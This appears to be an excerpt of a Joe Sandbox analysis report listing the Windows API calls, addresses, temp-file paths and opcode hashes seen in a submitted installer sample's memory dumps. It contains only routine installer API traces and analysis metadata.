                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                              • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                              • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-2950451457
                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                              • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                              • wsprintfW.USER32 ref: 00402EF5
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                • Part of subcall function 00402E72: MulDiv.KERNEL32(0001F421,00000064,00021AEC), ref: 00402E87
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                              • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                              • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                              • GetMessagePos.USER32 ref: 00404D3D
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                              • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                              • wsprintfW.USER32 ref: 00402E45
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                              • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                              • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                              APIs
                                                                                                                • Part of subcall function 701C121B: GlobalAlloc.KERNELBASE(00000040,?,701C123B,?,701C12DF,00000019,701C11BE,-000000A0), ref: 701C1225
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701C2657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C268C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: 9d8cd1d2d72f967c516dec051d612c8a37ee8f18e16e473c3425f41ff166d04c
                                                                                                              • Instruction ID: cfc6ec2fd73dd012bbaf6bf24323685497e89bccc6d4317b4b4acd0466635ae0
                                                                                                              • Opcode Fuzzy Hash: 9d8cd1d2d72f967c516dec051d612c8a37ee8f18e16e473c3425f41ff166d04c
                                                                                                              • Instruction Fuzzy Hash: 5E31BC32208111DFC7168F55CC94E6F7BBAFBA630072145A9FA4283A64CB70E865EB61
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                                              • API String ID: 3540041739-1320723960
                                                                                                              • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                              • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                              • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsvC041.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvC041.tmp$C:\Users\user\AppData\Local\Temp\nsvC041.tmp\System.dll
                                                                                                              • API String ID: 3109718747-3333376119
                                                                                                              • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                              • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                              • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 2979337801-0
                                                                                                              • Opcode ID: 596c95fceff2d4847a60650b17772f590d04ca4e1b48b09a9bc7ecac4175466e
                                                                                                              • Instruction ID: e243e00f0ff16368cc0e0a589b3f686e151dcc9836435560d97b9efd273811b6
                                                                                                              • Opcode Fuzzy Hash: 596c95fceff2d4847a60650b17772f590d04ca4e1b48b09a9bc7ecac4175466e
                                                                                                              • Instruction Fuzzy Hash: 5951D632D810D59ECB029FA4C5407AF7BBAFB77354B23865DE402A3B54D670EE818791
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C24D6
                                                                                                                • Part of subcall function 701C122C: lstrcpynW.KERNEL32(00000000,?,701C12DF,00000019,701C11BE,-000000A0), ref: 701C123C
                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 701C245C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 701C2477
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 4216380887-0
                                                                                                              • Opcode ID: 504309c566aa4352eaa214c8426ede9f85944d5ab3c3f0968e505ce2a10aced7
                                                                                                              • Instruction ID: c97ede82095733fb42061029f95d6e9bd3362a9bc335b3026178052a5cb431c4
                                                                                                              • Opcode Fuzzy Hash: 504309c566aa4352eaa214c8426ede9f85944d5ab3c3f0968e505ce2a10aced7
                                                                                                              • Instruction Fuzzy Hash: 2F41ABB1008345DFC3149F61D844B6F7BB8FBA9320F2149ADF546C6A91EB74E884DB62
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                              • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 3808545654-0
                                                                                                              • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                              • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                              • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701C21EC,?,00000808), ref: 701C1635
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701C21EC,?,00000808), ref: 701C163C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701C21EC,?,00000808), ref: 701C1650
                                                                                                              • GetProcAddress.KERNEL32(701C21EC,00000000), ref: 701C1657
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C1660
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1148316912-0
                                                                                                              • Opcode ID: 817734802e68abb7497d222cb71080e4aeec3879376f9390ed84bb6cd1ec143e
                                                                                                              • Instruction ID: 5b6c28dd3c59c6d03d0d05cddfe3b76d326a944a9b9207b2893ce16562df80dc
                                                                                                              • Opcode Fuzzy Hash: 817734802e68abb7497d222cb71080e4aeec3879376f9390ed84bb6cd1ec143e
                                                                                                              • Instruction Fuzzy Hash: BEF0F87324A1387B962016A78C48DDBBE9DEF8B2F5B210221F728921A086A18C1197F1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                              • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                              • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                              • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                              • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
